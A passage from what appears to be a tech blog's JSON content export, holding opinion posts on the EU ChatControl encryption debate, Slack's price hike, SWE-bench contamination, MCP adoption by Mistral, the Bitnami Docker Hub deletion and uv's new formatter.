doesn\u0026rsquo;t distinguish between scanning for illegal content and scanning for dissident content. 
Authoritarian regimes around the world would love this precedent.\nScope creep: Today it\u0026rsquo;s one specific category of illegal content. Tomorrow it\u0026rsquo;s terrorism. Then copyright infringement. Then \u0026ldquo;disinformation.\u0026rdquo; The history of surveillance technology is a history of mission creep.\nImplementation burden: Every messaging platform would need to implement and maintain scanning infrastructure, creating enormous compliance costs that disproportionately affect smaller and open-source projects. How does Signal, a non-profit, absorb this kind of mandate?\nGermany\u0026rsquo;s Blocking Minority # The good news this month is that Germany has maintained its opposition to ChatControl, securing enough allied votes to block the proposal at the EU Council level. Germany\u0026rsquo;s position, influenced by strong privacy advocacy and constitutional protections for communication privacy, has been a crucial counterweight to the proposal\u0026rsquo;s supporters.\nBut a blocking minority isn\u0026rsquo;t a victory — it\u0026rsquo;s a stalemate. The European Commission can revise and resubmit, and the political dynamics can shift. Some member states remain strongly in favor of mandatory scanning, and the emotional arguments in favor of it are powerful (even when the technical arguments are not).\nThis is why continued vigilance matters. The technical community needs to keep explaining, clearly and patiently, why this approach cannot work as advertised. Not because the goal is wrong — combating illegal content is a legitimate priority — but because the proposed mechanism would cause far more harm than good.\nWhat Developers Should Understand # If you build applications that handle private communication — and in 2025, that\u0026rsquo;s a lot of applications — ChatControl-style regulation could directly affect you. 
Even if you\u0026rsquo;re not building a messaging app, any application with user-to-user communication features could potentially fall under such mandates.\nHere\u0026rsquo;s what to think about:\nEncryption architecture matters: If you\u0026rsquo;re designing a system, think carefully about your encryption model. True end-to-end encryption is a feature that users increasingly demand, and any regulation that compromises it will force difficult product decisions.\nRegulatory divergence: The EU, US, UK, and other jurisdictions are all pursuing different approaches to encrypted communication. If you operate globally, you may face contradictory requirements. The UK\u0026rsquo;s Online Safety Act has similar provisions, though implementation details remain unclear. These regulatory trends represent a fundamental tension between innovation and governance that will define the next decade of software development.\nOpen source implications: If you maintain or contribute to open-source messaging tools, mandatory scanning requirements could create compliance obligations that are difficult or impossible to meet without corporate backing.\nMy Take # I\u0026rsquo;ve been in the security space long enough to recognize a pattern: governments periodically demand backdoors in encryption, technologists explain why that\u0026rsquo;s impossible without compromising everyone\u0026rsquo;s security, the proposal gets shelved, and then it comes back a few years later with different branding.\nThe Clipper Chip in the 1990s. The \u0026ldquo;going dark\u0026rdquo; narrative in the 2010s. Now ChatControl. The underlying tension is real — law enforcement\u0026rsquo;s job is genuinely harder when they can\u0026rsquo;t access communications. 
But the proposed solution — weakening encryption for everyone — is worse than the problem.\nI\u0026rsquo;m encouraged that Germany is holding the line, and that the technical community continues to engage substantively with this debate rather than dismissing it. The stakes parallel what we\u0026rsquo;re seeing with supply chain security initiatives — where technical solutions must navigate political complexity. But we can\u0026rsquo;t be complacent. This proposal, or something very like it, will keep coming back until there\u0026rsquo;s a definitive political resolution.\nIn the meantime, if you\u0026rsquo;re building systems that people depend on for private communication, keep building them right. Strong encryption isn\u0026rsquo;t just a feature — it\u0026rsquo;s a responsibility.\nThis post is part of the Security in Practice series, covering real-world security issues that affect developers and the systems we build.\n","date":"25 September 2025","externalUrl":null,"permalink":"/posts/250925-eu-chatcontrol-encryption-threat/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The EU’s latest push to scan encrypted messages reignites the fundamental debate about whether governments can mandate backdoors without destroying security for everyone.","title":"EU ChatControl Is Back — And It's Still a Terrible Idea for Encryption","type":"posts"},{"content":"","date":"25 September 2025","externalUrl":null,"permalink":"/tags/privacy/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Privacy","type":"tags"},{"content":"A post titled \u0026ldquo;Slack has raised our charges by $195k per year\u0026rdquo; exploded across Hacker News this week, hitting over 3,400 points and generating nearly 1,500 comments. 
The numbers are staggering, but the real story isn\u0026rsquo;t about one company\u0026rsquo;s pricing decision — it\u0026rsquo;s about a structural problem in how we\u0026rsquo;ve built our technology stacks.\nThe Pricing Shock # The details from the original post paint a grim picture. An organization that had been paying a certain rate for Slack Enterprise suddenly received a renewal quote with a $195,000 annual increase. Not a gradual ramp. Not a modest inflationary adjustment. A sudden, substantial jump that forces a binary choice: absorb the cost or migrate away.\nThis pattern should feel familiar. Salesforce does it. Oracle does it. AWS does it (more subtly, through the complexity of their pricing models). Once your organization is deeply embedded in a platform — your workflows, integrations, institutional knowledge, and data all living there — the switching costs become enormous. And that\u0026rsquo;s when the price increases come.\nSlack specifically has been on this trajectory since the Salesforce acquisition. The integration with Salesforce\u0026rsquo;s broader enterprise sales machine has shifted Slack from a bottoms-up developer tool to a top-down enterprise platform with enterprise pricing to match. The product may not have changed much, but the go-to-market motion certainly has.\nThe Hidden Cost of Platform Dependency # Here\u0026rsquo;s what the $195K number actually represents: the price of dependency. Every Slack bot you\u0026rsquo;ve built, every workflow automation, every integration with your ticketing system, monitoring tools, and deployment pipelines — all of that represents switching costs. Salesforce (and every other enterprise SaaS vendor) knows exactly how embedded they are in your operations, and they price accordingly.\nI\u0026rsquo;ve seen this movie before, multiple times across my career. In the early 2000s, it was Oracle database licensing. In the 2010s, it was VMware. Now it\u0026rsquo;s SaaS platforms. 
The pattern is always the same:\nOffer a compelling product at a reasonable price Achieve deep organizational penetration Get acquired by (or become) a company focused on maximizing revenue per customer Raise prices because switching costs make it rational for customers to pay The frustration in the Hacker News comments was palpable. Engineers who had championed Slack within their organizations now feel betrayed. But the reality is that this outcome was predictable the moment Slack became critical infrastructure without any contractual price protection.\nWhat Engineering Leaders Should Do # If this story has you nervously looking at your own SaaS bills, here\u0026rsquo;s a practical framework:\nAudit Your SaaS Stack # Most organizations have no idea how much they\u0026rsquo;re actually spending on SaaS. Shadow IT purchases, seat-based licenses for people who barely use the tool, overlapping functionality between platforms — it adds up quickly. Before you can optimize, you need visibility.\nRun a comprehensive audit. List every SaaS product, its cost, its contract renewal date, and critically, how deeply integrated it is with your workflows. That integration depth is your switching cost, and it\u0026rsquo;s your leverage (or lack thereof) in negotiations.\nBuild Abstraction Layers # For critical communication infrastructure, consider building abstraction layers in your integrations. Instead of having your deployment pipeline post directly to Slack\u0026rsquo;s API, have it post to an internal messaging abstraction that can route to Slack, Teams, Mattermost, or whatever comes next.\nYes, this is more work upfront. Yes, most teams won\u0026rsquo;t do it until they feel the pain. But the teams that have abstraction layers in place can credibly threaten to switch platforms during contract negotiations, and that threat is worth real money.\nEvaluate Open Source Alternatives # The Mattermost and Rocket.Chat communities are probably having a very good week. 
Self-hosted communication platforms have matured significantly, and for organizations with the engineering capacity to run them, they offer both cost predictability and data sovereignty.\nThe trade-off is operational overhead. Running a communication platform at scale isn\u0026rsquo;t trivial — you need to handle availability, security updates, mobile apps, and user support. But for organizations spending six figures or more on Slack, the math might work.\nNegotiate Aggressively # If you\u0026rsquo;re staying with Slack, use this moment as leverage. Salesforce\u0026rsquo;s sales team knows that this pricing controversy has organizations evaluating alternatives. Multi-year commitments with price caps, volume discounts, and contractual protections against sudden increases should all be on the table.\nThe Bigger Picture: SaaS Inflation # What we\u0026rsquo;re witnessing across the industry is a SaaS inflation crisis. The total cost of a modern technology stack — cloud infrastructure, communication, project management, CI/CD, monitoring, security tools — has been growing faster than most organizations\u0026rsquo; revenue. Something has to give.\nI think we\u0026rsquo;re heading toward a correction. Not a crash, but a rationalization. Organizations that treated SaaS spending as an afterthought are being forced to make hard choices. The \u0026ldquo;just put it on the company card\u0026rdquo; era of SaaS procurement is ending.\nThe smart move for engineering leaders is to get ahead of this. Don\u0026rsquo;t wait for your CFO to come asking why the technology budget is growing 30% year over year while revenue grows 10%. Build cost awareness into your engineering culture now. Evaluate open source alternatives not as a cost-cutting exercise but as a strategic hedge against vendor pricing power.\nMy Take # I have a lot of sympathy for the teams caught in this situation, but I have limited sympathy for the organizations that let it happen. 
We\u0026rsquo;ve known for decades that vendor lock-in leads to pricing power abuse. The SaaS model made it feel different because the switching costs were less visible — they\u0026rsquo;re in integrations and workflows rather than data format lock-in — but the dynamics are identical.\nMy rule of thumb: any tool that touches more than 50% of your engineering team\u0026rsquo;s daily workflow should be treated as critical infrastructure, with all the risk management that implies. That means contractual protections, switching cost analysis, and viable alternatives identified before you need them.\nA $195K price increase is painful. But the lesson is worth learning: in the cloud era, the rent can always go up.\nThis post is part of the Infrastructure Notes series, where I cover the tools, platforms, and practices that keep our systems running — or don\u0026rsquo;t.\n","date":"18 September 2025","externalUrl":null,"permalink":"/posts/250918-slack-price-hike-saas-costs/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A viral post about Slack’s massive price increase highlights the growing problem of SaaS cost escalation and what engineering teams can do about it.","title":"Slack Just Raised Prices by $195K — The SaaS Cost Reckoning Is Here","type":"posts"},{"content":"A bombshell dropped in the AI coding community this week: research published on the SWE-bench GitHub repository shows that top model scores on one of the most widely-cited benchmarks for AI coding ability may be significantly skewed by git history leaks. In plain terms: the models may have seen the answers during training.\nThis isn\u0026rsquo;t a minor methodological quibble. SWE-bench has become the primary yardstick that companies use to claim their AI coding assistant is better than the competition. 
If those scores are unreliable, a lot of the narrative around AI coding progress needs recalibrating.\nUnderstanding the Contamination # SWE-bench works by presenting AI models with real GitHub issues from popular open-source projects and asking them to generate the correct fix. The benchmark includes the issue description, the codebase at the time of the issue, and evaluates whether the model\u0026rsquo;s patch resolves the problem.\nThe contamination problem is straightforward: if a model was trained on data that includes the git history of these repositories — including the commits that actually fixed these issues — then the model isn\u0026rsquo;t demonstrating reasoning ability. It\u0026rsquo;s doing sophisticated pattern matching against memorized solutions.\nGit history is a particularly insidious source of contamination because it\u0026rsquo;s everywhere. Any training dataset that includes GitHub data (which is\u0026hellip; most of them) potentially contains the exact patches that SWE-bench tests for. Even if you filter out the specific files involved in benchmark tasks, git commit messages, pull request discussions, and code review comments often contain enough information to reconstruct the solution.\nThe researchers found that when they controlled for contamination — testing on issues that couldn\u0026rsquo;t have appeared in training data — model performance dropped significantly. The exact numbers vary by model, but the gap between contaminated and clean evaluations was large enough to change the leaderboard rankings.\nWhy This Matters Beyond Benchmarks # You might think: \u0026ldquo;Who cares about benchmark scores? I care about whether the tool actually helps me code.\u0026rdquo; And that\u0026rsquo;s fair. But benchmark contamination matters for several reasons that directly affect practitioners.\nResource allocation decisions: Companies are spending millions on AI coding tools based partly on benchmark performance. 
If those benchmarks don\u0026rsquo;t measure what they claim to measure, those investments might be misallocated. A team choosing between Copilot, Cursor, or another tool often looks at SWE-bench scores as a proxy for capability.\nResearch direction: The AI research community uses benchmarks to decide what approaches work. If contaminated benchmarks make certain architectures look better than they are, we might be pursuing dead ends while ignoring more promising paths.\nOverfitting to the test: There\u0026rsquo;s a well-documented phenomenon in education where \u0026ldquo;teaching to the test\u0026rdquo; produces students who score well but lack genuine understanding. The same thing happens with AI models. Optimizing for SWE-bench scores — especially when the test data leaks into training — produces models that look impressive on paper but may struggle with genuinely novel problems.\nThe Broader Benchmark Crisis # SWE-bench isn\u0026rsquo;t the only benchmark with contamination issues. This is a systemic problem across AI evaluation. HumanEval, MBPP, and most other coding benchmarks face similar risks. The internet is a giant corpus, and separating \u0026ldquo;training data\u0026rdquo; from \u0026ldquo;evaluation data\u0026rdquo; is increasingly difficult when models are trained on significant fractions of all publicly available text.\nSome approaches to mitigation include:\nTemporal cutoffs: Only testing on issues created after the model\u0026rsquo;s training data cutoff. This helps but doesn\u0026rsquo;t eliminate the problem — data leaks are messy and imprecise.\nPrivate benchmarks: Creating evaluation datasets that are never published. This works but limits reproducibility and community scrutiny.\nSynthetic benchmarks: Generating entirely new problems that couldn\u0026rsquo;t exist in any training corpus. 
This is promising but raises questions about whether synthetic problems are representative of real-world coding tasks.\nLive evaluation: Testing models on truly new, just-created issues in real-time. This is the gold standard but is expensive and difficult to standardize.\nI think the industry needs a combination of all four approaches. No single method is sufficient.\nWhat This Means for AI-Assisted Development # Here\u0026rsquo;s my practical take for developers using AI coding tools today: ignore the benchmarks and evaluate tools based on your own experience with your own codebase.\nI\u0026rsquo;ve been using various AI coding assistants for over a year now, and my assessment doesn\u0026rsquo;t correlate perfectly with benchmark scores. The tool that helps me most is the one that best understands the context of my specific project — the architecture, the conventions, the common patterns. That\u0026rsquo;s not something any generic benchmark can measure.\nSome concrete evaluation criteria that I find more meaningful than SWE-bench scores:\nContext handling: Can the tool effectively use your project\u0026rsquo;s existing code as context when generating suggestions? Error recovery: When the first suggestion is wrong (and it often is), how well does the tool iterate based on your feedback? Explanation quality: Can it explain why it\u0026rsquo;s suggesting a particular approach, not just what code to write? Edge case awareness: Does it handle error cases, null checks, and boundary conditions, or does it only generate the happy path? The Trust Problem # There\u0026rsquo;s a deeper issue at play. The AI industry has a credibility problem when it comes to self-reported performance metrics. When the same companies that build the models also choose which benchmarks to highlight, cherry-picking is inevitable. 
The SWE-bench contamination issue is just the most visible example of a broader pattern where impressive-sounding numbers don\u0026rsquo;t always translate to real-world utility.\nThis matters because trust is the foundation of adoption. Developers are pragmatic — we adopt tools that make us more productive and abandon those that don\u0026rsquo;t. But the evaluation and marketing of AI tools has become so benchmark-driven that it\u0026rsquo;s genuinely difficult to separate signal from noise.\nMy Take # I\u0026rsquo;ve been saying for a while that we need better ways to evaluate AI coding tools, and this week\u0026rsquo;s news makes that case more urgently. SWE-bench was a genuinely innovative benchmark when it launched — testing on real-world issues from real projects was a big step forward from toy problems. But the contamination issue means we can\u0026rsquo;t trust the scores at face value.\nMy hope is that this revelation drives investment in better evaluation methodology. The research community knows how to build robust benchmarks — it just requires more effort and expense than training a model and cherry-picking a favorable number.\nIn the meantime, be skeptical of any company that leads their marketing with benchmark scores. The real test of an AI coding tool is whether it makes you more productive on your code. 
Everything else is just marketing.\nThis post is part of the AI in Development series, where I track how artificial intelligence is reshaping the tools and practices of software engineering.\n","date":"11 September 2025","externalUrl":null,"permalink":"/posts/250911-swe-bench-git-history-leaks/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Research reveals that top AI coding model scores on SWE-bench may be inflated due to git history leaks, raising fundamental questions about how we evaluate AI coding capabilities.","title":"SWE-bench Benchmark Contamination — When the Test Answers Are in the Training Data","type":"posts"},{"content":"Mistral announced this week that Le Chat now supports custom MCP connectors and persistent memory. On its own, adding tool-use features to yet another AI chatbot isn\u0026rsquo;t exactly groundbreaking. But the choice to build on the Model Context Protocol (MCP) — rather than inventing a proprietary integration layer — is the real story here, and it tells us a lot about where AI tooling is heading.\nMCP: From Anthropic Side Project to Industry Standard # For those not tracking the protocol wars in AI tooling, MCP (Model Context Protocol) was originally introduced by Anthropic as an open standard for connecting AI models to external tools and data sources. The concept is straightforward: define a standard way for AI systems to discover, invoke, and receive results from external tools, regardless of which model or platform you\u0026rsquo;re using.\nWhat\u0026rsquo;s remarkable is the adoption curve. In just a few months, MCP has gone from \u0026ldquo;interesting idea from one AI company\u0026rdquo; to something that OpenAI, Google, and now Mistral are all implementing. 
This kind of rapid convergence on a shared protocol is unusual in tech — we usually spend years arguing about standards before anything gets adopted (looking at you, every web services standard from 2005-2015).\nThe reason for the quick adoption is pragmatic: nobody wants to build N×M integrations where N is the number of AI platforms and M is the number of external tools. MCP gives you a single integration point. Build an MCP server for your database, your CRM, your monitoring system, and every AI platform that speaks MCP can use it. That\u0026rsquo;s a powerful value proposition.\nWhat Mistral Actually Shipped # Le Chat\u0026rsquo;s implementation includes several notable features. First, users can configure custom MCP connectors, meaning you can point Le Chat at any MCP-compatible server and the model can interact with it. This could be a company\u0026rsquo;s internal knowledge base, a project management tool, or a code repository.\nSecond, they\u0026rsquo;ve added persistent memory — the ability for Le Chat to remember context across conversations. This is distinct from simply having a long context window. Memory here means the system actively stores and retrieves relevant information from past interactions, building a working model of your preferences, projects, and patterns.\nThe combination is more interesting than either feature alone. An AI assistant with both tool access and memory can do things like: \u0026ldquo;Remember that I\u0026rsquo;m working on the payment service migration? Pull the latest error logs from our monitoring system and compare them against the issues we discussed last Tuesday.\u0026rdquo; That\u0026rsquo;s a fundamentally different interaction model than a stateless chatbot.\nThe Developer Tooling Implications # For developers, the MCP ecosystem is creating a new category of infrastructure to build and maintain. 
If you\u0026rsquo;re running any kind of internal tooling, you should be thinking about MCP servers.\nHere\u0026rsquo;s a concrete example. Say your team uses a custom deployment system. Today, an engineer might ask an AI assistant about deployment best practices and get generic advice. With an MCP connector to your deployment system, the assistant can see your actual deployment history, understand your specific configuration, and give contextual advice based on your real infrastructure.\nThe protocol itself is designed around JSON-RPC 2.0, which means implementing an MCP server is approachable for most backend developers. You define your tools (with schemas describing their inputs and outputs), expose them via the protocol, and any MCP-capable client can discover and use them.\nI\u0026rsquo;ve been experimenting with building MCP servers for some of my own infrastructure, and the developer experience is surprisingly smooth. A basic server that exposes a few tools can be built in an afternoon. The harder part is thinking carefully about what operations you want an AI to be able to perform and what guardrails you need.\nThe Emerging AI Middleware Stack # What we\u0026rsquo;re watching form is essentially a middleware layer for AI. Just as the 2010s saw the emergence of an API economy with REST as the lingua franca, the mid-2020s are producing an AI tool economy with MCP as the integration standard.\nThis has some interesting second-order effects:\nFor platform companies: Supporting MCP becomes table stakes. Mistral\u0026rsquo;s move this week puts pressure on any AI platform that hasn\u0026rsquo;t adopted it yet. The network effect here is strong — the more tools speak MCP, the more valuable MCP-compatible platforms become.\nFor tool builders: There\u0026rsquo;s a land grab happening for MCP server implementations. The team that builds the best MCP server for Jira, or Salesforce, or GitHub, captures a lot of value. 
It\u0026rsquo;s analogous to the early days of Zapier or IFTTT, but for AI tool access.\nFor enterprises: MCP presents both opportunity and risk. The opportunity is genuine productivity gains from AI that can access your actual systems. The risk is the security surface area — every MCP connector is a potential path for an AI to access (and potentially modify) sensitive data.\nSecurity Considerations # Speaking of security, this is the area where I think the industry is moving too fast. MCP connectors that give AI systems read access to production databases, deployment pipelines, or customer data need extremely careful authentication and authorization design.\nThe current state of MCP security is\u0026hellip; evolving. OAuth-based auth flows are supported, but the granularity of permission models varies widely between implementations. An MCP server that gives \u0026ldquo;read access to the monitoring system\u0026rdquo; might also expose sensitive customer data in log entries. The blast radius of a misconfigured connector could be significant.\nMy recommendation: start with read-only MCP connectors in non-production environments. Build your security model iteratively, and don\u0026rsquo;t let enthusiasm for AI productivity gains outrun your security review process.\nMy Take # I\u0026rsquo;m genuinely optimistic about MCP as a protocol. The AI industry desperately needs standards that prevent vendor lock-in and reduce integration complexity. MCP isn\u0026rsquo;t perfect, but it\u0026rsquo;s good enough and it\u0026rsquo;s gaining momentum fast enough that it might actually stick.\nMistral\u0026rsquo;s adoption of MCP is particularly interesting because it validates the protocol from a non-Anthropic perspective. When the creator of a standard uses it, that\u0026rsquo;s expected. 
When competitors adopt it too, that\u0026rsquo;s a signal.\nWhat I\u0026rsquo;m watching for next is whether MCP becomes the standard for AI-to-AI communication, not just AI-to-tool communication. As we build systems with multiple specialized agents, they\u0026rsquo;ll need a common protocol to collaborate. MCP might evolve to fill that role, or something new might emerge. Either way, we\u0026rsquo;re in the early innings of a very significant infrastructure shift.\nThis post is part of the AI in Development series, where I track how artificial intelligence is reshaping the tools and practices of software engineering.\n","date":"4 September 2025","externalUrl":null,"permalink":"/posts/250904-mistral-le-chat-mcp-connectors/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Mistral adds custom MCP connectors and persistent memory to Le Chat, signaling that the Model Context Protocol is becoming the standard glue for AI tool integration.","title":"Mistral's Le Chat Gets MCP Connectors — The Protocol That's Quietly Connecting Everything","type":"posts"},{"content":"","date":"28 August 2025","externalUrl":null,"permalink":"/tags/docker/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Docker","type":"tags"},{"content":"If you woke up this week to broken deployments and scrambled to figure out why your containers wouldn\u0026rsquo;t pull, you weren\u0026rsquo;t alone. Broadcom quietly deleted the docker.io/bitnami namespace from Docker Hub, taking with it one of the most widely-used collections of pre-built application containers in the ecosystem. For teams running Redis, PostgreSQL, WordPress, Kafka, or any of dozens of other services via Bitnami images, this was a very bad morning.\nThe news spread rapidly across developer communities, with the official Broadcom announcement doing little to soften the blow. 
Let me walk through what happened, why it matters, and what you should be doing differently.\nWhat Actually Happened # Bitnami has been a staple of the container ecosystem for years. Their pre-packaged, regularly updated images made it trivially easy to spin up complex services. Need a properly configured Kafka cluster? docker pull bitnami/kafka and you were off. When Broadcom acquired VMware (which had previously acquired Bitnami), the writing was on the wall for anyone paying attention — but the speed and completeness of this deletion caught many off guard.\nThe images weren\u0026rsquo;t deprecated with a sunset timeline. They weren\u0026rsquo;t moved to a new namespace with redirects. They were simply\u0026hellip; gone. If your Kubernetes manifests, Docker Compose files, or CI/CD pipelines referenced docker.io/bitnami/*, they stopped working. No warning, no migration path announced beforehand.\nThis is particularly painful because Bitnami images had become something of a de facto standard. Helm charts across the ecosystem default to Bitnami images. Internal documentation at countless companies says \u0026ldquo;just use the Bitnami image.\u0026rdquo; I\u0026rsquo;ve personally recommended them in architecture reviews for years.\nThe Registry Dependency Problem # This incident exposes a fundamental fragility in how most organizations manage their container supply chain. We\u0026rsquo;ve collectively built an infrastructure pattern where thousands of production systems depend on the continued existence and availability of specific image tags on a third-party registry.\nThink about it: your production Kubernetes cluster, running your revenue-generating application, depends on being able to pull an image from a namespace controlled by a corporation that may decide at any moment to restructure, rebrand, or simply delete things. 
This isn\u0026rsquo;t a theoretical risk anymore.\nThe mitigation isn\u0026rsquo;t complicated, but it requires discipline:\nRun a private registry — Harbor, GitLab Container Registry, AWS ECR, Azure ACR. Mirror every external image you depend on. Pin image digests, not tags — bitnami/redis:7.2 is a moving target. bitnami/redis@sha256:abc123... is immutable (assuming the registry keeps it). Build your own base images — Yes, it\u0026rsquo;s more work. But you control the supply chain entirely. Treat container images like vendored dependencies — You wouldn\u0026rsquo;t let your Go modules or npm packages disappear from under you (well, we learned that lesson too). I\u0026rsquo;ve been running a Harbor instance for my own projects for a few years now, and I mirror every upstream image I use. It adds maybe 30 minutes to my setup process for a new project, but events like this validate that investment completely.\nThe Broadcom Effect # Let\u0026rsquo;s zoom out a bit. This isn\u0026rsquo;t an isolated incident — it\u0026rsquo;s part of a pattern. Since Broadcom\u0026rsquo;s acquisition of VMware closed, the company has been aggressively restructuring, re-licensing, and consolidating. VMware licensing changes have already pushed many organizations to evaluate alternatives. The Bitnami deletion is another data point in the same trend.\nWhen a company focused on maximizing acquisition value takes over developer-beloved tools, the tools often suffer. We\u0026rsquo;ve seen this play out with Oracle and Java, with IBM and Red Hat (though that\u0026rsquo;s been more nuanced), and now with Broadcom and the VMware ecosystem.\nThe broader lesson is about organizational dependency. Open source software is only as reliable as the entity hosting it. The code itself might be free, but the distribution infrastructure — registries, package managers, CDNs — represents real costs that somebody has to bear. 
When the entity bearing those costs changes priorities, you feel it.\nWhat Teams Should Do Right Now # If you\u0026rsquo;re still recovering from this week\u0026rsquo;s outage, here\u0026rsquo;s the immediate action plan:\nShort term: Find where Bitnami images were being used. Check your Dockerfiles, Compose files, Helm charts, and CI pipelines. Broadcom has indicated that images will be available through their own registry, so update your references accordingly — but don\u0026rsquo;t just point to the new location and call it done.\nMedium term: Set up image mirroring. Every external image your production systems use should be cached in a registry you control. This is non-negotiable for any serious deployment.\nLong term: Evaluate whether you actually need pre-built images at all. For many services, building from the official upstream image (e.g., the official redis image on Docker Hub, maintained by the Docker community) is just as easy and removes the Bitnami dependency entirely.\nMy Take # I\u0026rsquo;ll be honest — I\u0026rsquo;m annoyed but not surprised. The consolidation of open source tooling under large corporate umbrellas has been accelerating, and the incentives don\u0026rsquo;t align with long-term community stewardship. Bitnami was enormously valuable precisely because it was reliable and consistent. That reliability was always contingent on someone choosing to maintain it.\nThe container ecosystem has matured enough that we should treat image registries with the same skepticism we treat any external dependency. Mirror everything. Pin everything. Trust nothing you don\u0026rsquo;t control.\nThirty years in this industry has taught me one thing above all: the infrastructure you depend on will eventually be pulled out from under you. 
Plan accordingly.\nThis post is part of the Infrastructure Notes series, where I cover the tools, platforms, and practices that keep our systems running — or don\u0026rsquo;t.\n","date":"28 August 2025","externalUrl":null,"permalink":"/posts/250828-bitnami-docker-deletion/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Broadcom’s deletion of Bitnami images from Docker Hub is a wake-up call about depending on container registries you don’t control.","title":"The Bitnami Docker.io Deletion — When Your Infrastructure Disappears Overnight","type":"posts"},{"content":"Astral, the company behind the Ruff linter and uv package manager, just announced experimental code formatting support in uv. If you\u0026rsquo;ve been following the Python tooling evolution, this is another significant step in what\u0026rsquo;s becoming one of the most ambitious consolidation efforts in any language ecosystem.\nFor context: uv started as a pip replacement — a fast package installer written in Rust. Then it absorbed virtual environment management. Then project management. Then Python version management. Now it\u0026rsquo;s adding code formatting. At some point, you have to step back and ask: is this the right approach, or is one tool trying to do too much?\nThe Case for Consolidation # Let me start with why this matters. The traditional Python development setup involves juggling multiple tools:\npyenv or python-build for Python version management venv or virtualenv for virtual environments pip (and maybe pip-tools or pip-compile) for package installation poetry or pdm for project management and dependency resolution black or autopep8 for code formatting ruff or flake8 for linting mypy or pyright for type checking That\u0026rsquo;s seven or more tools, each with its own configuration file, its own update cycle, and its own quirks. 
Compared to ecosystems like Rust (cargo does almost everything) or Go (the go tool handles building, testing, formatting, and dependency management), Python has felt fragmented.\nuv\u0026rsquo;s approach is to collapse this stack. One tool, written in Rust for performance, handling everything from installing Python itself to formatting your code. The appeal is obvious: fewer tools to install, configure, and keep updated. One consistent CLI. One configuration file.\nWhat the Formatting Integration Looks Like # The experimental formatting support in uv leverages the same Rust codebase that powers Ruff\u0026rsquo;s formatter. This isn\u0026rsquo;t a separate tool bundled in — it\u0026rsquo;s deeply integrated. You run uv format and your code gets formatted according to your project configuration.\nThe integration means formatting is aware of your project context. It knows your Python version target, your dependency tree, and your project structure. This contextual awareness allows for smarter formatting decisions and better error messages when things go wrong.\nPerformance is, as expected, excellent. Formatting a large codebase takes milliseconds rather than seconds. When you\u0026rsquo;re running formatting on every save or in a pre-commit hook, that speed difference compounds into meaningful productivity gains.\nThe Concerns # I\u0026rsquo;m broadly positive about uv, but I think the consolidation trajectory deserves some critical examination.\nSingle point of failure: When one tool handles everything, a bug in that tool can block your entire workflow. If uv has a packaging bug, you can\u0026rsquo;t install dependencies. If it has a formatting bug, your CI pipeline breaks. With separate tools, a bug in Black doesn\u0026rsquo;t affect your ability to install packages.\nVendor concentration: Astral is a VC-funded startup. The Python ecosystem\u0026rsquo;s core tooling becoming dependent on a single company\u0026rsquo;s product is a legitimate concern. 
This mirrors broader concerns about infrastructure consolidation in cloud and open source ecosystems. What happens if Astral\u0026rsquo;s business model doesn\u0026rsquo;t work out? The code is open source, which provides some insurance, but maintaining a project this complex requires sustained investment.\nThe Bazaar vs. the Cathedral: Python\u0026rsquo;s tooling fragmentation isn\u0026rsquo;t just a historical accident — it reflects the language\u0026rsquo;s culture of diverse approaches and community-driven development. There\u0026rsquo;s value in having multiple tools competing and innovating. When one tool dominates, that competitive pressure diminishes.\nConfiguration migration: If you\u0026rsquo;ve invested time configuring Black, isort, flake8, and mypy separately, migrating to a unified uv configuration isn\u0026rsquo;t trivial. The tools have subtly different defaults and behaviors, and ensuring your formatting output doesn\u0026rsquo;t change during migration requires careful testing.\nThe Broader Trend # What\u0026rsquo;s happening with uv reflects a broader trend across programming language ecosystems: developers want batteries-included toolchains. The success of cargo (Rust), go (Go), and even deno (JavaScript/TypeScript) demonstrates that having a single, opinionated tool that handles the common workflow is what most developers prefer.\nPython has historically resisted this approach — \u0026ldquo;there should be one obvious way to do it\u0026rdquo; is a Python zen principle, but Python tooling has been the poster child for having seventeen ways to do everything. uv is the most credible attempt to change that.\nThis week also saw the Ghostty project requiring AI tooling disclosure for contributions, which is an interesting parallel. 
As our tools become more powerful and more integrated, the question of transparency about what tools we use — and how much we depend on them — becomes increasingly important.\nMy Recommendation # If you\u0026rsquo;re starting a new Python project today, use uv. The speed improvements alone justify the switch, and the integrated workflow is genuinely pleasant. The formatting support is experimental, but Astral has a strong track record of shipping quality — Ruff went from unknown to industry standard in about a year. This kind of rapid iteration and improvement parallels what we\u0026rsquo;re seeing with AI-assisted development tools.\nIf you have existing projects with established tooling, don\u0026rsquo;t rush to migrate. Wait for the formatting support to stabilize, evaluate the migration path carefully, and switch when the benefits clearly outweigh the transition costs.\nAnd regardless of what tools you use, keep your configuration in version control, document your toolchain choices, and make sure your team can reproduce the development environment from scratch. Tool choices change; good engineering practices don\u0026rsquo;t.\nMy Take # I\u0026rsquo;ve watched Python\u0026rsquo;s tooling story evolve from distutils to setuptools to pip to poetry to uv, and each step has been an improvement. uv adding formatting feels like we\u0026rsquo;re approaching the endgame — a point where a single uv command can bootstrap an entire Python development environment from nothing.\nThat\u0026rsquo;s remarkable for a language that\u0026rsquo;s thirty years old. Most ecosystems this mature are stuck with their legacy tooling decisions. Python is getting a genuine fresh start on tooling, and so far, the results are impressive.\nWill I miss the days of carefully curating my pyproject.toml with separate Black, isort, and mypy sections? 
